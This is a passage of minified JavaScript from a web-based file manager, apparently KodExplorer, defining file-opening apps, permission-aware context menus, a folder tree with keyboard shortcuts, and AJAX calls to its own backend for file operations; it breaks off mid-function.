      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/rightMenu",[],function(){var e=".menu-file",t=".menu-folder",a=".menu-more",i=".menu-tree-root",n=".menu-tree-folder",o=".menu-tree-file",s={"list-icon":{name:LNG.list_type,icon:"eye-open",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep105:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},r=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),c(),d(),p(),u(),m(),v(),k(),y(),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},l=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),m(),k(),g(),b(),y(),$(".context-menu-root").addClass("animated fadeIn")},c=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){f(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":s["list-icon"],"sort-by":s["sort-by"],"set-file-icon-size":s["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path+"Ctrl+F",className:"search",icon:"search",accesskey:"s"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},p=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:e,className:e.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},u=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){h(e)},items:{down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},f=function(e){switch(e){case"refresh":ui.f5(!0,!0);break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"info":ui.path.info();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(150);break;case"box-size-bigx":ui.setFileIconSize(220);break;case"open":ui.path.open();break;default:}},h=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"search":ui.path.search();break;case"show-file":ui.path.shareFile();break;case"open-project":ui.path.openProject();break;case"info":ui.path.info();break;default:}},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},v=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},g=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},b=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){x(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},y=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},k=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{"close-all":{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},"show-all":{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},"hide-all":{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"show-all":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hide-all":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"close-all":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})},x=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"info":ui.tree.info();break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"show-file":ui.tree.showFile();break;case"download":ui.tree.download();break;case"search":ui.tree.search();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initExplorer:r,initEditor:l}}),define("app/src/shareEditor/ui",[],function(){var e=function(){var e=!1,t=0,a=0,i=0,n=$(".frame-left"),o=$(".frame-resize"),s=$(".frame-right");o.die("mousedown").live("mousedown",function(e){return 1!=e.which?!0:(r(e),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){l(e)}),$(document).one("mouseup",function(e){return c(e),this.releaseCapture&&this.releaseCapture(),stopPP(e),!1}),stopPP(e),!1)});var r=function(i){e=!0,t=i.pageX,a=$(".frame-left").width(),o.addClass("active"),$(".resize-mask").css("display","block")},l=function(r){if(!e)return!0;var l=r.pageX-t,c=a+l;i>c&&(c=i),c>$(document).width()-200&&(c=$(document).width()-200),n.css("width",c),o.css("left",c-5),s.css("left",c+1)},c=function(){return e?(e=!1,o.removeClass("active"),$(".resize-mask").css("display","none"),void 0):!1}},t=function(){$(".tools-left a").click(function(){var e=$(this).attr("class"); +switch(e){case"home":tree.init();break;case"view":tree.explorer();break;case"folder":tree.create("folder");break;case"file":tree.create("file");break;case"refresh":tree.init();break;default:}})};return{init:function(){e(),t(),tree.init(),Mousetrap.bind(["ctrl+s","command+s"],function(e){e.preventDefault(),e.returnvalue=!1,ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()})})},setTheme:function(e){core.setSkin(e,"app_editor.css"),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)})},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},fileHistory:function(e){var t=G.project;if(G.sid!==void 0&&(t=t+"__"+G.sid),t="editorHistory_"+t,void 0==e){var a=LocalData.get(t);return a=jsonDecode(a),$.isArray(a)||(a=[]),a}LocalData.set(t,jsonEncode(e))}}}),define("app/common/tree",["../path/pathOperate","../path/clipboard","../path/search"],function(e){var t,a,i=e("../path/pathOperate"),n=e("../path/clipboard"),o=e("../path/search"),s=!1;ui.pathOperate=i;var r=function(e,t){var a=["menu-tree-group","menu-tree-fav","menu-tree-folder-fav"];if(e&&e[0]&&-1!==$.inArray(e[0].menuType,a))return e;for(var i=[],n=[],o=0;e.length>o;o++)e[o].drop=!1,e[o].drag=!1,e[o].name=e[o].name,e[o].isParent&&e[o].children&&(e[o].children=r(e[o].children)),e[o].isWriteable,"folder"==e[o].type?n.push(e[o]):i.push(e[o]);return t?e:(n=n.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),i=i.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),n.concat(i))},l=function(){var e={},t="tree_open_"+md5(Config.pageApp),i=function(e){if(!LocalData.support())return{};if(void 0==e){var a=LocalData.getConfig(t);return 0==a?{}:a}LocalData.setConfig(t,e)},n=function(t){for(var a=0;t.length>a;a++){var i=t[a].path;void 0!==e[i]&&(t[a].open=e[i])}return t},o=function(){for(var t=a.getNodesByFilter(function(e){return 0==e.level?!0:!1}),n={},o=0;t.length>o;o++)n[t[o].path]=t[o].open;return e=n,i(e),e};return e=i(),{list:function(){return e},reset:n,save:o}}(),c=function(){$.ajax({url:G.appHost+Config.treeAjaxURL+"&type=init",dataType:"json",error:function(){$("#folder-list-tree").html('
      '+LNG.system_error+"
      ")},success:function(e){if(!e.code)return $("#folder-list-tree").html('
      '+LNG.system_error+"
      "),void 0;var t=r(e.data,!0);t=l.reset(t),$.fn.zTree.init($("#folder-list-tree"),u,t),a=$.fn.zTree.getZTreeObj("folder-list-tree")}}),$(".ztree .switch").die("mouseenter").live("mouseenter",function(){$(this).addClass("switch_hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("switch_hover")}),core.isApp("editor")&&(Mousetrap.bind("up",function(e){d(e,"up")}).bind("down",function(e){d(e,"down")}).bind("left",function(e){d(e,"left")}).bind("right",function(e){d(e,"right")}),Mousetrap.bind("enter",function(){tree.open()}).bind(["del","command+backspace"],function(){tree.remove()}).bind("f2",function(e){stopPP(e),tree.rname()}).bind(["ctrl+f","command+f"],function(e){stopPP(e),tree.search()}).bind(["ctrl+c","command+c"],function(){tree.copy()}).bind(["ctrl+x","command+x"],function(){tree.cute()}).bind(["ctrl+v","command+v"],function(){tree.past()}).bind("alt+m",function(){tree.create("folder")}).bind("alt+n",function(){tree.create("file")}))},d=function(e,t){stopPP(e);var i=a.getSelectedNodes()[0];if(i)switch(t){case"up":var n=i.getPreNode();if(n){if(n.open&&n.children.length>0)for(;n.open&&n.children&&n.children.length>=1;)n=n.children[n.children.length-1]}else n=i.getParentNode();a.selectNode(n);break;case"down":if(i.open&&i.children.length>=1)n=i.children[0];else{var o=i,n=o.getNextNode()||o.getParentNode().getNextNode();try{for(;!n;)o=o.getParentNode(),n=o.getNextNode()||o.getParentNode().getNextNode()}catch(e){}}a.selectNode(n);break;case"left":i.isParent?i.open?a.expandNode(i,!1):a.selectNode(i.getParentNode()):a.selectNode(i.getParentNode());break;case"right":i.open?a.selectNode(i.children[0]):a.expandNode(i,!0);break;default:}},p=function(){return core.isApp("editor")?!1:!0},u={async:{enable:!0,dataType:"json",url:function(){return G.appHost+Config.treeAjaxURL},autoParam:["ajax_path=path","tree_icon=tree_icon"],dataFilter:function(e,t,a){return a.code?r(a.data):null}},edit:{enable:!0,showRemoveBtn:!1,showRenameBtn:!1,drag:{isCopy:!1,isMove:!1}},view:{showLine:!1,selectedMulti:!1,expandSpeed:"fast",dblClickExpand:!1,addDiyDom:function(e,t){var a=15,i=$("#"+t.tId+"_switch"),n=$("#"+t.tId+"_ico");i.remove(),t.iconSkin=t.tree_icon;var o=t.tree_icon;if(t.ext?o=t.ext:t.tree_icon||(o=t.type),n.before(i).before(''+core.iconSmall(o)+"").remove(),void 0!=t.ext&&n.attr("class","").addClass("file "+t.ext).removeAttr("style"),t.level>=1){var s="";i.before(s)}i.before("");var r="";void 0!=t.menuType?r=t.menuType:(("file"==t.type||"oexe"==t.ext)&&(r="menu-tree-file"),"folder"==t.type&&(r="menu-tree-folder"));var l=LNG.name+":"+t.name+"\n"+LNG.size+":"+pathTools.fileSize(t.size)+"\n"+LNG.modify_time+":"+t.mtime;"file"!=t.type&&(l=t.name),i.parent().addClass(r).attr("title",l),0==t.isWriteable&&i.parent().addClass("file-not-writeable"),0==t.isReadable&&i.parent().addClass("file-not-readable"),0===t.exists&&i.parent().addClass("file-not-readable")}},callback:{onClick:function(e,t,i){if($(e.target).hasClass("menu-item")||$(e.target).parent().hasClass("menu-item")){var n=$("#"+i.tId+"_a"),o=n.find(".menu-item");return n.contextMenu({x:o.offset().left+o.width(),y:o.offset().top}),stopPP(e)}return a.selectNode(i),core.isApp("editor")&&"folder"==i.type?(a.expandNode(i),void 0):(core.isApp("editor")||"folder"!=i.type?(kodApp.setLastOpenTarget($("#"+i.tId)),kodApp.open(f().path)):ui.path.list(i.path),void 0)},beforeDblClick:function(){return!0},onCollapse:function(e,t,a){0==a.level&&l.save()},onExpand:function(e,t,a){0==a.level&&l.save()},onDblClick:function(e,t,i){return $(e.target).hasClass("switch")||!p()?!1:(a.expandNode(i),void 0)},beforeRightClick:function(e,t){a.selectNode(t)},beforeAsync:function(e,t){t.ajax_name=t.name,t.ajax_path=t.path,$("#"+t.tId+"_my_ico").addClass("ico_loading")},onAsyncSuccess:function(e,i,n,o){return $("#"+n.tId+"_my_ico").removeClass("ico_loading"),0==o.data.length?(a.removeChildNodes(n),void 0):("function"==typeof t&&(t(),t=void 0),void 0)},onRename:function(e,n,o){var s=o.getParentNode();if(a.getNodesByParam("name",o.name,s).length>1)return Tips.tips(LNG.name_isexists,!1),a.removeNode(o),void 0;if(o.create){var r=o.path+"/"+o.name;"folder"==o.type?i.newFolder(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)}):i.newFile(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)})}else{var l=rtrim(o.path,"/"),c=core.pathFather(o.path)+o.name;i.rname(l,c,function(e){o.path=e,t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b(),"folder"==o.type&&ui.path.list(o.path)},h(s)})}},beforeDrag:function(e,t){for(var a=0,i=t.length;i>a;a++)if(t[a].drag===!1)return!1;return!0},beforeDrop:function(e,t,a){return a?a.drop!==!1:!0},onDrop:function(e,t,a,i){var o="",s="",r=a[0];(r.father||r.thisPath)&&(o=r.father+urlEncode(r.name),s=i.father+urlEncode(i.name),n.cuteDrag([{path:o,type:r.type}],s,function(){h(r)}))}}},f=function(e){if(a){var t=a.getSelectedNodes()[0],i="";return t?(i=t.type,("_null_"==i||void 0==i)&&(i="folder"),"file"==i&&(i=t.ext),e?[{path:t.path,type:i,node:t}]:{path:t.path,type:i,node:t}):{path:"",type:""}}},h=function(e){return e||(e=a.getSelectedNodes()[0]),e.isParent||(e=e.getParentNode())?(a.reAsyncChildNodes(e,"refresh"),void 0):(ui.tree.init(),void 0)},m=function(){g(G.KOD_USER_FAV),b()},v=function(){m(),g(G.KOD_GROUP_ROOT_SELF),g(G.KOD_GROUP_ROOT_ALL)},g=function(e){var t=a.getNodesByParam("path",e,null);h(t[0])},b=function(){core.isApp("explorer")&&ui.f5()};return{makeParam:f,treeOpenHistory:l,treeDataSort:r,init:c,refresh:h,refreshPath:g,refreshFav:m,refreshGroup:v,zTree:function(){return a},openEditor:function(){kodApp.open(f().path)},openWindow:function(){kodApp.openWindow(f().path)},share:function(){i.share(f())},download:function(){"folder"==f().type?i.zipDownload(f(!0)):kodApp.download(f().path)},setSelect:function(e){return},open:function(){if(!($(".dialog-path-remove").length>=1)){var e=f();"oexe"==e.type&&(e.path=e.node),kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e.path,e.type)}},fav:function(){var e=f();e.name=e.node.name,e.node="null",i.fav(e)},createLink:function(e){var t=f();i.createLink(t.path,t.node.name,t.type,e,b)},search:function(){o("",f().path)},appEdit:function(){var e=f(),t=e.node;t.path=e.path,i.appEdit(t,function(){h(e.node.getParentNode())})},info:function(){i.info(f(!0))},copy:function(){n.copy(f(!0))},cute:function(){n.cute(f(!0))},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){n.copyDrag(f(!0),e,"",!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){n.cuteDrag(f(!0),e,function(){g()})})},past:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.past(e.path,function(){b(),h(e.node)})},clone:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.copyDrag(f(!0),core.pathFather(e.path),function(){b(),"folder"==e.type?h(e.node.getParentNode()):h(e.node)},!0)},favRemove:function(){i.favRemove(f().node.name,function(e){Tips.tips(e),m()})},remove:function(){var e=f(!0),t=e[0].node.getParentNode();e[0].type=e[0].node.type,e[0].type="folder"==e[0].type?"folder":"file",i.remove(e,function(){b(),h(t)})},checkIfChange:function(e){s||(s=!0,a&&(a.getNodesByFilter(function(t){var a=t.path;return"folder"==t.type&&core.pathClear(a)==core.pathClear(e)&&h(t),!1},!0),setTimeout(function(){s=!1},500)))},explorer:function(){var e=a.getSelectedNodes();if(0>=e.length){var t=a.getNodes();a.selectNode(t[0])}var i=f().path;"folder"!=f().type&&(i=core.pathFather(i)),core.explorer(i)},openProject:function(){core.explorerCode(f().path)},create:function(e){var i=a.getSelectedNodes();if(0>=i.length){var n=a.getNodes();a.selectNode(n[0])}else"file"==i[0].type&&a.selectNode(i[0].getParentNode());var o=f(),s=o.node,r=s.getParentNode(),l="newfile",c=0,d=LNG.newfolder;if("folder"==e){for(;a.getNodesByParam("name",d+"("+c+")",r).length>0;)c++;newNode={name:d+"("+c+")",ext:"",type:"folder",create:!0,path:o.path}}else{for(var p=e;a.getNodesByParam("name",l+"("+c+")."+p,r).length>0;)c++;newNode={name:l+"("+c+")."+p,ext:p,type:"file",create:!0,path:o.path}}if(void 0!=s.children){var u=a.addNodes(s,newNode)[0];a.editName(u)}else"folder"!=s.type&&(s=s.getParentNode()),t=function(){var e=a.addNodes(s,newNode)[0];a.editName(e)},s.isParent?a.expandNode(s):t()},showFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+f().path;window.open(e)},rname:function(){var e=a.getSelectedNodes()[0];a.editName(e),e.beforeName=e.name}}}),define("app/path/pathOperate",[],function(e){tplFileInfo=e("./tpl/fileinfo/fileInfo.html"),tplPathInfo=e("./tpl/fileinfo/pathInfo.html");var t=["/","\\",":","*","?",'"',"<",">","|"],a=["/","\\"],i=function(e){var i=function(e,t){for(var a=t.length,i=0;a>i;i++)if(e.indexOf(t[i])>0)return!0;return!1},n=a;return G.systemOS&&"windows"==G.systemOS&&(n=t),i(e,n)?(Tips.tips(LNG.path_not_allow+": "+n.join(", "),!1),!1):!0},n=function(e){for(var t=[],a=function(e){return e?e.replace(/"/g,'\\\\"'):e},i=0;e.length>i;i++)t.push({type:a(e[i].type),path:urlEncode(a(e[i].path))});return"dataArr="+jsonEncode(t)},o=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkfile&path="+urlEncode(e),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},s=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkdir&path="+urlEncode(e),beforeSend:function(){"function"==typeof t&&Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},r=function(e,t,a){return e&&t&&e!=t?i(core.pathThis(t))?($.ajax({type:"POST",dataType:"json",url:G.appHost+"explorer/pathRname",data:"path="+urlEncode(e)+"&rnameTo="+urlEncode(t),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof a&&(e&&e.info?a(e.info):a(!1))}}),void 0):("function"==typeof 